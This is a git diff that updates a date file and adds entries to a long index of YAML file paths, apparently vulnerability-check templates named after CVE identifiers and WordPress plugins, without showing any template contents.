diff --git a/date.txt b/date.txt
index 7e53ea86ed..cd765ecede 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240822
+20240823
diff --git a/poc.txt b/poc.txt
index 8972ea2383..4b5c09733f 100644
--- a/poc.txt
+++ b/poc.txt
@@ -3663,6 +3663,7 @@
./poc/auth/login-as-customer-or-user-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/auth/login-as-customer-or-user-plugin.yaml
./poc/auth/login-as-customer-or-user.yaml
+./poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml
./poc/auth/login-attempts-limit-wp-a27b928af3555fe96c9110a0c596251e.yaml
./poc/auth/login-attempts-limit-wp-a3d4d3eee498ab5be06833bab20d1678.yaml
./poc/auth/login-attempts-limit-wp.yaml
@@ -3974,12 +3975,14 @@
./poc/auth/multiple-post-passwords-c4023fed8d5ddfc28cec448447826074.yaml
./poc/auth/multiple-post-passwords.yaml
./poc/auth/mycred-00ffa23d5c48d24d4837746f02ce0263.yaml
+./poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml
./poc/auth/mycred-167b1689069341ae1373ef65caf6a7e2.yaml
./poc/auth/mycred-213821b28d4a15d3347e2d7540937de1.yaml
./poc/auth/mycred-215bb39cd24cfaf3c7acf4e324020e7a.yaml
./poc/auth/mycred-24bd66bd3e5bf279792175df9ac21b29.yaml
./poc/auth/mycred-252d1898a18cf06099cbdc2b8717c288.yaml
./poc/auth/mycred-597541d0b79a0c6362895f01e993f1e8.yaml
+./poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml
./poc/auth/mycred-6477bf18cad6c823db485408d49b337b.yaml
./poc/auth/mycred-657249c74dcfd1c69ed803f7ade2353f.yaml
./poc/auth/mycred-78c60bc023056731606cd8fe6e484cad.yaml
@@ -35166,6 +35169,7 @@
./poc/cve/CVE-2024-27999-c77a895775d3643585822943d1340fe7.yaml
./poc/cve/CVE-2024-27999.yaml
./poc/cve/CVE-2024-28000-cf6ac978bbc80445dcf2da6ef53372ad.yaml
+./poc/cve/CVE-2024-28000.yaml
./poc/cve/CVE-2024-28001-37a725cdeb2e43640f8b5b37ee68b599.yaml
./poc/cve/CVE-2024-28001.yaml
./poc/cve/CVE-2024-28002-d246eae6901505d7ec249d64baf8e0c4.yaml
@@ -38281,6 +38285,7 @@
./poc/cve/CVE-2024-35766.yaml
./poc/cve/CVE-2024-35767-73b7a679244b7ad191218a3cf64b6ae0.yaml
./poc/cve/CVE-2024-35767.yaml
+./poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml
./poc/cve/CVE-2024-35768-ad9d4298895b2898fe0d8b7e72b459bb.yaml
./poc/cve/CVE-2024-35768.yaml
./poc/cve/CVE-2024-35769-f82dc7eccca54732b79253717fa94d1e.yaml
@@ -39181,6 +39186,7 @@
./poc/cve/CVE-2024-38673.yaml
./poc/cve/CVE-2024-38674-f4bef651de2f444a0b8d5c3f5550236e.yaml
./poc/cve/CVE-2024-38674.yaml
+./poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml
./poc/cve/CVE-2024-38675-4826fb05eaa1c318d3425e0adefbbbd3.yaml
./poc/cve/CVE-2024-38675.yaml
./poc/cve/CVE-2024-38676-9bc1ea991477b3e5c0b9aa7cce839be9.yaml
@@ -39634,6 +39640,7 @@
./poc/cve/CVE-2024-39664.yaml
./poc/cve/CVE-2024-39665-eb86ffef2c0d7c6205176cce262c3985.yaml
./poc/cve/CVE-2024-39665.yaml
+./poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml
./poc/cve/CVE-2024-39668-a8fc61243890a8b4d5c1db69e4467701.yaml
./poc/cve/CVE-2024-39668.yaml
./poc/cve/CVE-2024-39678-70f27dc1298f6ae4ac79bb3c3bf23903.yaml
@@ -40011,6 +40018,7 @@
./poc/cve/CVE-2024-43212-fa7c63c9c1acaf40e2a0fa149e79e1fd.yaml
./poc/cve/CVE-2024-43212.yaml
./poc/cve/CVE-2024-43213-035ab3596c728eee900f004610ee954d.yaml
+./poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml
./poc/cve/CVE-2024-43213.yaml
./poc/cve/CVE-2024-43214-e3240af5e23abfaaa28c0e373364a098.yaml
./poc/cve/CVE-2024-43214.yaml
@@ -40022,6 +40030,7 @@
./poc/cve/CVE-2024-43217-45501803094a8231702c0947dd4fac76.yaml
./poc/cve/CVE-2024-43217.yaml
./poc/cve/CVE-2024-43218-0326506cc055bcde33922247269b6844.yaml
+./poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml
./poc/cve/CVE-2024-43218.yaml
./poc/cve/CVE-2024-43219-7b8d7750f9d277ba2b03b2344f90c2f4.yaml
./poc/cve/CVE-2024-43219-f14ca834a32fdfd1c7fc5fa3461f213d.yaml
@@ -40056,26 +40065,73 @@
./poc/cve/CVE-2024-43235.yaml
./poc/cve/CVE-2024-43236-0aa244f387067d6fa1a2f360a122d1ca.yaml
./poc/cve/CVE-2024-43236.yaml
+./poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml
+./poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml
./poc/cve/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml
./poc/cve/CVE-2024-4324.yaml
+./poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml
+./poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml
+./poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml
+./poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml
+./poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml
+./poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml
+./poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml
+./poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml
+./poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml
+./poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml
+./poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml
+./poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml
+./poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml
+./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml
+./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml
+./poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml
+./poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml
+./poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml
+./poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml
+./poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml
+./poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml
+./poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml
+./poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml
+./poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml
+./poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml
+./poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml
+./poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml
+./poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml
+./poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml
+./poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml
+./poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml
+./poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml
+./poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml
+./poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml
./poc/cve/CVE-2024-43277-6b4940f2eac79c6e5fa7f9ba0cc0604e.yaml
./poc/cve/CVE-2024-43277.yaml
+./poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml
+./poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml
+./poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml
+./poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml
+./poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml
+./poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml
+./poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml
./poc/cve/CVE-2024-43285-2259cac19eda110255245b91d280697e.yaml
./poc/cve/CVE-2024-43285.yaml
./poc/cve/CVE-2024-43287-b8c9808356b0d4ca60466a01cf2f6ffc.yaml
./poc/cve/CVE-2024-43287.yaml
+./poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml
+./poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml
./poc/cve/CVE-2024-4329-0b2116d78c4eba82eeda084c20215115.yaml
./poc/cve/CVE-2024-4329.yaml
./poc/cve/CVE-2024-43290-6aaddd95421bac5d3791131102bf0d20.yaml
./poc/cve/CVE-2024-43290.yaml
./poc/cve/CVE-2024-43291-dabd8edbe180773a366911d00bf7b3d8.yaml
./poc/cve/CVE-2024-43291.yaml
+./poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml
./poc/cve/CVE-2024-43293-4ded08b075aff72e2714da1bf0758502.yaml
./poc/cve/CVE-2024-43293.yaml
./poc/cve/CVE-2024-43294-74cdcbe12dafdf14c55db65337423666.yaml
./poc/cve/CVE-2024-43294.yaml
./poc/cve/CVE-2024-43295-e48e7df4f337c104fbb6960b7a073918.yaml
./poc/cve/CVE-2024-43295.yaml
+./poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml
./poc/cve/CVE-2024-43297-d97e1b82684ec5fda05751316b5bf585.yaml
./poc/cve/CVE-2024-43297.yaml
./poc/cve/CVE-2024-43298-6c52a4ccd32e47bf034fb72c4a4cdca9.yaml
@@ -40086,14 +40142,21 @@
./poc/cve/CVE-2024-43301.yaml
./poc/cve/CVE-2024-43302-7eb579c0aaaf235ed55e89a50bb63283.yaml
./poc/cve/CVE-2024-43302.yaml
+./poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml
./poc/cve/CVE-2024-43304-195bc96c646d6ca6175e1ee2e543c7e0.yaml
./poc/cve/CVE-2024-43304.yaml
./poc/cve/CVE-2024-43305-1d51a608cf1e6b149a393660c5257486.yaml
./poc/cve/CVE-2024-43305.yaml
+./poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml
+./poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml
+./poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml
+./poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml
./poc/cve/CVE-2024-43310-f45a761baa6c56237775fa475b020a07.yaml
./poc/cve/CVE-2024-43310.yaml
+./poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml
./poc/cve/CVE-2024-43312-a955ef755ede1aff915d714d801fd4f2.yaml
./poc/cve/CVE-2024-43312.yaml
+./poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml
./poc/cve/CVE-2024-43314-c4f69d44bf9c33670d3edf1035d16ec7.yaml
./poc/cve/CVE-2024-43314.yaml
./poc/cve/CVE-2024-43315-22f15f2b106abaa3fabeaf39acb88e9f.yaml
@@ -40102,8 +40165,12 @@
./poc/cve/CVE-2024-43316.yaml
./poc/cve/CVE-2024-43317-011ac22d3cc6a5c25823442686fbcdc2.yaml
./poc/cve/CVE-2024-43317.yaml
+./poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml
+./poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
./poc/cve/CVE-2024-43320-7a90f649b86cc56b7a348322fbac253a.yaml
./poc/cve/CVE-2024-43320.yaml
+./poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml
+./poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml
./poc/cve/CVE-2024-43323-1e55a206c0d1e018c5ca8cb550ad6b43.yaml
./poc/cve/CVE-2024-43323.yaml
./poc/cve/CVE-2024-43324-f70541b1201ac529a1d78e7fc9af3a3e.yaml
@@ -40112,16 +40179,20 @@
./poc/cve/CVE-2024-43325.yaml
./poc/cve/CVE-2024-43326-24f0ba897b67329ec3ddf6753f94ed32.yaml
./poc/cve/CVE-2024-43326.yaml
+./poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml
+./poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml
./poc/cve/CVE-2024-43329-67a50fee28efbf96992a3faa792ae691.yaml
./poc/cve/CVE-2024-43329.yaml
./poc/cve/CVE-2024-4333-f46d8860d5d05aeb17e4da3bc1c85b85.yaml
./poc/cve/CVE-2024-4333.yaml
./poc/cve/CVE-2024-43330-9d2e621ed81c65b734c8c2d120237457.yaml
./poc/cve/CVE-2024-43330.yaml
+./poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml
./poc/cve/CVE-2024-43331-b3b203fb21a1b3cd285f2a3e0685b04a.yaml
./poc/cve/CVE-2024-43331.yaml
./poc/cve/CVE-2024-43332-53d4557dc08feb794f7aa79a5132bebf.yaml
./poc/cve/CVE-2024-43332.yaml
+./poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml
./poc/cve/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml
./poc/cve/CVE-2024-43336.yaml
./poc/cve/CVE-2024-43337-d59a162bda0a92fcb5cbdc9c17791b8c.yaml
@@ -40134,16 +40205,25 @@
./poc/cve/CVE-2024-43340.yaml
./poc/cve/CVE-2024-43341-7cb78fbac960da5bc11a78009c156b3f.yaml
./poc/cve/CVE-2024-43341.yaml
+./poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml
./poc/cve/CVE-2024-43343-bd86d015b232e15272dc87f2bcd25950.yaml
./poc/cve/CVE-2024-43343.yaml
+./poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml
+./poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml
+./poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml
./poc/cve/CVE-2024-43347-0ff8bf2832d5ae37d05ab294908e3044.yaml
./poc/cve/CVE-2024-43347.yaml
+./poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml
./poc/cve/CVE-2024-43349-7fa6ced0e3688a0b29dd0f4527ae5d77.yaml
./poc/cve/CVE-2024-43349.yaml
./poc/cve/CVE-2024-4335-b652f11b1fd244c356f7f9040d2d61fc.yaml
./poc/cve/CVE-2024-4335.yaml
+./poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml
./poc/cve/CVE-2024-43351-4309475ec19267ac7d3446460f31cb63.yaml
./poc/cve/CVE-2024-43351.yaml
+./poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml
+./poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml
+./poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml
./poc/cve/CVE-2024-43355-aaaae66dd8d3768a39f3d3ed3c2c4630.yaml
./poc/cve/CVE-2024-43355.yaml
./poc/cve/CVE-2024-43356-05ef8f8be0b196ca83c544147054d339.yaml
@@ -40962,6 +41042,7 @@
./poc/cve/CVE-2024-5489.yaml
./poc/cve/CVE-2024-5501-ef276788ff5605e6f36a518160e844c2.yaml
./poc/cve/CVE-2024-5501.yaml
+./poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml
./poc/cve/CVE-2024-5503-19d06aa0a465a31a35fc811375db77be.yaml
./poc/cve/CVE-2024-5503-22284592e7f2d4be691954a9ef8c96d2.yaml
./poc/cve/CVE-2024-5503.yaml
@@ -41016,6 +41097,7 @@
./poc/cve/CVE-2024-5582-65655490bb0f32fe01c9013362ded541.yaml
./poc/cve/CVE-2024-5582.yaml
./poc/cve/CVE-2024-5583-4bf5df60bad728c4d77db23548e2e248.yaml
+./poc/cve/CVE-2024-5583.yaml
./poc/cve/CVE-2024-5584-9e83a16e4845144224090f291ae51eb8.yaml
./poc/cve/CVE-2024-5584.yaml
./poc/cve/CVE-2024-5595-ceb803f50c0ac8e651f08593893d8cdd.yaml
@@ -41473,6 +41555,7 @@
./poc/cve/CVE-2024-6365.yaml
./poc/cve/CVE-2024-6366-ea7ffa5d59aec7bd8b9ff2b236517b74.yaml
./poc/cve/CVE-2024-6386-4eed3d73004ed1a5572fcec0bbe99148.yaml
+./poc/cve/CVE-2024-6386.yaml
./poc/cve/CVE-2024-6387.yaml
./poc/cve/CVE-2024-6390-5e93fafd922f6a8ef1963ab0cc893053.yaml
./poc/cve/CVE-2024-6390.yaml
@@ -41743,6 +41826,7 @@
./poc/cve/CVE-2024-6869-5e7fa08dfa3c0ebbfb8e613b40ae4241.yaml
./poc/cve/CVE-2024-6869.yaml
./poc/cve/CVE-2024-6870-761b9012a27c3dd65906ec5f425408c2.yaml
+./poc/cve/CVE-2024-6870.yaml
./poc/cve/CVE-2024-6872-906780e4d16fb616e7eb84af4109c545.yaml
./poc/cve/CVE-2024-6872.yaml
./poc/cve/CVE-2024-6883-bf3d691e7629ebe7204e53eef0a10a24.yaml
@@ -41817,6 +41901,8 @@
./poc/cve/CVE-2024-7247.yaml
./poc/cve/CVE-2024-7257-33ebc9b4c8b24813569400d3b00f9ba3.yaml
./poc/cve/CVE-2024-7257.yaml
+./poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml
+./poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
./poc/cve/CVE-2024-7291-9e11faff80d98ce3a78b182e2348528f.yaml
./poc/cve/CVE-2024-7291.yaml
./poc/cve/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml
@@ -41836,6 +41922,7 @@
./poc/cve/CVE-2024-7382-0f2463e87e68ece5440ee53e60a45241.yaml
./poc/cve/CVE-2024-7382.yaml
./poc/cve/CVE-2024-7384-3cbb9a04d55569f550da959253703e68.yaml
+./poc/cve/CVE-2024-7384.yaml
./poc/cve/CVE-2024-7388-71222ccca29202f8dadfe5a2196ab818.yaml
./poc/cve/CVE-2024-7388.yaml
./poc/cve/CVE-2024-7389-3c018c5673a3c698e331d5cecece4963.yaml
@@ -41874,6 +41961,7 @@
./poc/cve/CVE-2024-7548.yaml
./poc/cve/CVE-2024-7556-b7fed9351bafa7783a59e9c29c4c745a.yaml
./poc/cve/CVE-2024-7556.yaml
+./poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml
./poc/cve/CVE-2024-7560-ce54c359794ac142d8dfa3e7571236b5.yaml
./poc/cve/CVE-2024-7560.yaml
./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml
@@ -41919,6 +42007,7 @@
./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml
./poc/cve/CVE-2024-7777.yaml
./poc/cve/CVE-2024-7778-f6a8eafbead2f11189d44eaa4bf9f2d7.yaml
+./poc/cve/CVE-2024-7778.yaml
./poc/cve/CVE-2024-7780-4daa2f3a76c9e2c11c9a8f6d36ef5ef2.yaml
./poc/cve/CVE-2024-7780.yaml
./poc/cve/CVE-2024-7782-33cd7b02fe64ca6292df042c7ea86c84.yaml
@@ -41926,7 +42015,9 @@
./poc/cve/CVE-2024-7827-a9ee234376e66a977fd41d75d242919a.yaml
./poc/cve/CVE-2024-7827.yaml
./poc/cve/CVE-2024-7836-c3f06662e71acb6bbefc389fb9e7704e.yaml
+./poc/cve/CVE-2024-7836.yaml
./poc/cve/CVE-2024-7848-a4dfad44ff5af24a4a686e6afb9aa2fb.yaml
+./poc/cve/CVE-2024-7848.yaml
./poc/cve/CVE-2024-7850-5b82e2527caadc3756488893ee8930f4.yaml
./poc/cve/CVE-2024-7850.yaml
./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml
@@ -59678,6 +59769,7 @@
./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml
./poc/microsoft/white-label-cms-272dfd7025c6616944dcebc3b3edd27c.yaml
./poc/microsoft/white-label-cms-53cd08acf6eebef08aab7e9f2df58232.yaml
+./poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml
./poc/microsoft/white-label-cms-b166eba2be9153930cd892a3828217b0.yaml
./poc/microsoft/white-label-cms-cf61bb06d2f0eb06f00e67756a62407f.yaml
./poc/microsoft/white-label-cms-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -64694,6 +64786,10 @@
./poc/other/biteship-8c3214c3a61a8360d72b6a3b3aa6df23.yaml
./poc/other/biteship-b991bdd855711ef3d58623bc7370e7fa.yaml
./poc/other/biteship.yaml
+./poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml
+./poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml
+./poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml
+./poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml
./poc/other/bithighway-product.yaml
./poc/other/bitkeeper.yaml
./poc/other/bitly.yaml
@@ -65792,6 +65888,7 @@
./poc/other/businessexpo.yaml
./poc/other/busiprof-157cf14a019f2f39567d396451ba436d.yaml
./poc/other/busiprof-3e9ea6cb923b68a31d48f29cdc3c95d0.yaml
+./poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml
./poc/other/busiprof-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/busiprof-theme-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/busiprof-theme.yaml
@@ -66880,6 +66977,7 @@
./poc/other/cleantalk-spam-protect-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/cleantalk-spam-protect-plugin.yaml
./poc/other/cleantalk-spam-protect.yaml
+./poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml
./poc/other/clearfy-550ff7e8c6e09cc736e7f2542671495e.yaml
./poc/other/clearfy-c0336a65d0bc0eb447d7d2f7a087f8a2.yaml
./poc/other/clearfy-cf3fed297e3831245af4f41c4a412af1.yaml
@@ -67058,6 +67156,8 @@
./poc/other/clover-online-orders-56bbfa33086145c5853aa24f3681cc5a.yaml
./poc/other/clover-online-orders-a88a3d82b56d6bb2eceae8b92ff3c51b.yaml
./poc/other/clover-online-orders-ae0fb38ae7706d7e81dac3edf540dc72.yaml
+./poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml
+./poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml
./poc/other/clover-online-orders.yaml
./poc/other/club-management-software-51fc41ad94a54763e52ddcc22cd04e65.yaml
./poc/other/club-management-software.yaml
@@ -67914,6 +68014,7 @@
./poc/other/contest-gallery-1f25062dfe0eaacffe2280aab6f92ff8.yaml
./poc/other/contest-gallery-323b96f00ad116e47f3edde3efb3b797.yaml
./poc/other/contest-gallery-356b17ac7a3cbf37f03ac814e78cb562.yaml
+./poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml
./poc/other/contest-gallery-376c740b45ad9e886368212a5f31f016.yaml
./poc/other/contest-gallery-41f26c36efd0640befa355bd3c87e70c.yaml
./poc/other/contest-gallery-4394367c0b844f62ffb487901a7ab495.yaml
@@ -69361,6 +69462,7 @@
./poc/other/discy-57105b51f4903a49473849de5abbe472.yaml
./poc/other/discy.yaml
./poc/other/disneyplus-phish.yaml
+./poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml
./poc/other/display-admin-page-on-frontend-6c0fa46386393b85d0ad0c373ab077eb.yaml
./poc/other/display-admin-page-on-frontend.yaml
./poc/other/display-custom-post-aa757b5702d208e7dc541f210bf378bd.yaml
@@ -70086,6 +70188,7 @@
./poc/other/e2pdf-41451f8ab0320b9bdaee2534b639fa4d.yaml
./poc/other/e2pdf-4bc4b8ed199b4ecc105e9687f540b218.yaml
./poc/other/e2pdf-ad7756ac25f7c2d461fdf573593bf588.yaml
+./poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml
./poc/other/e2pdf-d4de66f8961ceb83151e4edc41f8e53c.yaml
./poc/other/e2pdf-f5e45b0c3960892499c8d3b1509bee7b.yaml
./poc/other/e2pdf.yaml
@@ -70985,6 +71088,7 @@
./poc/other/embedpress-4c19e1bca820cb242174b7a9d0ea8299.yaml
./poc/other/embedpress-5022a01b1a8a064b5566e5d4d81337dc.yaml
./poc/other/embedpress-57a4a208af2b4ef2c84c9964d7d23928.yaml
+./poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml
./poc/other/embedpress-64fd27994160f6b6dd5da6d42c0bddc8.yaml
./poc/other/embedpress-6941dedfddf8fc169d5f576d749bb2a4.yaml
./poc/other/embedpress-6ca79d6ef0533e6bc0b4d1e1dd0fd443.yaml
@@ -72979,6 +73083,7 @@
./poc/other/formcraft3-1abcc6fd96ea11726161daf8ff61e96c.yaml
./poc/other/formcraft3.yaml
./poc/other/formfacade-2d90c45aeeb16b4b940215c06811a0b1.yaml
+./poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml
./poc/other/formfacade.yaml
./poc/other/formforall-3ca8822ef010b490061fcfa39d3c005a.yaml
./poc/other/formforall.yaml
@@ -73966,6 +74071,7 @@
./poc/other/give.yaml
./poc/other/giveaway-1d9e0bf21577ede31febad46bce13674.yaml
./poc/other/giveaway.yaml
+./poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml
./poc/other/gkrellm.yaml
./poc/other/glass-b3268283daf190fd77277f208bd83ee4.yaml
./poc/other/glass.yaml
@@ -74366,6 +74472,7 @@
./poc/other/gutenslider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/gutenslider-plugin.yaml
./poc/other/gutenslider.yaml
+./poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
./poc/other/gutenverse-40a79e4610379f5cd721264ce32ca881.yaml
./poc/other/gutenverse-6f744d9cd8863d765631de4d3721f56e.yaml
./poc/other/gutenverse-d18f386a56dccce0e578f26d0a128ebd.yaml
@@ -74905,6 +75012,7 @@
./poc/other/hqtheme-extra-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/hqtheme-extra-plugin.yaml
./poc/other/hqtheme-extra.yaml
+./poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml
./poc/other/hreflang-manager-lite-4fdca8511452f1b9eaf9cfabe504c2f4.yaml
./poc/other/hreflang-manager-lite-c79e04798382f59535d810f01cec980c.yaml
./poc/other/hreflang-manager-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -74989,6 +75097,7 @@
./poc/other/html5-soundcloud-player-with-playlist-4d1667fb6e30b2ac93e754f36234469e.yaml
./poc/other/html5-soundcloud-player-with-playlist.yaml
./poc/other/html5-video-player-0d2cf6941c370b58ffb31226e43735d1.yaml
+./poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml
./poc/other/html5-video-player-cba7fe3e122d338cdcaadebd04df764f.yaml
./poc/other/html5-video-player-eb51e10eb4da657b0275fe0f0befe3f2.yaml
./poc/other/html5-video-player-with-playlist-883e01b86f50bd15b1e6802446307f82.yaml
@@ -75162,9 +75271,12 @@
./poc/other/icegram-4ff957997aaadab58fd8b72e836e6479.yaml
./poc/other/icegram-82a9becdc162f5bfb48c752d9aa10047.yaml
./poc/other/icegram-9c8e80fa2e8ff53b0c42c7e0e01329cb.yaml
+./poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml
./poc/other/icegram-ad72b8ca7fcf72f961a5f9bbde7a51f2.yaml
+./poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml
./poc/other/icegram-fedfea5addd692ebf0d9057d63bb92ea.yaml
./poc/other/icegram-rainmaker-2973e938414f006ad90e20818eae97df.yaml
+./poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml
./poc/other/icegram-rainmaker.yaml
./poc/other/icegram.yaml
./poc/other/icewarp_server.yaml
@@ -75609,6 +75721,7 @@
./poc/other/indeed-job-importer.yaml
./poc/other/indeed-membership-pro-10f878c021d16b7ca46625504c67b941.yaml
./poc/other/indeed-membership-pro-1f404e2e090055cfa4d9b05683a60ba4.yaml
+./poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml
